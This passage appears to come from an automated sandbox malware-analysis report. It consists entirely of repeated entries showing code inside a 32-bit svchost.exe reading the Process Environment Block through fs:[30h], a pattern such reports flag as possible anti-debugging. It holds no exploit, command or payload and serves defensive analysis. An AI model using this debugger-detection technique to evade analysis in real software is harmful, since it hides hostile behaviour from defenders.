Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]	2_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]	2_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]	2_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]	2_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]	2_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]	2_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]	2_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]	2_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]	2_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]	2_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]	2_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]	2_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]	2_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]	2_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]	2_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]	2_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]	2_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]	2_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]	2_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]	2_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]	2_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]	2_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]	2_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]	2_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]	2_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]	2_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]	2_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]	2_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]	2_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]	2_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]	2_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]	2_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]	2_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]	2_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]	2_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]	2_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]	2_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]	2_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]	2_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]	2_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]	2_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]	2_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]	2_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]	2_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]	2_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]	2_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]	2_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]	2_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]	2_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]	2_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]	2_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]	2_2_0386A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
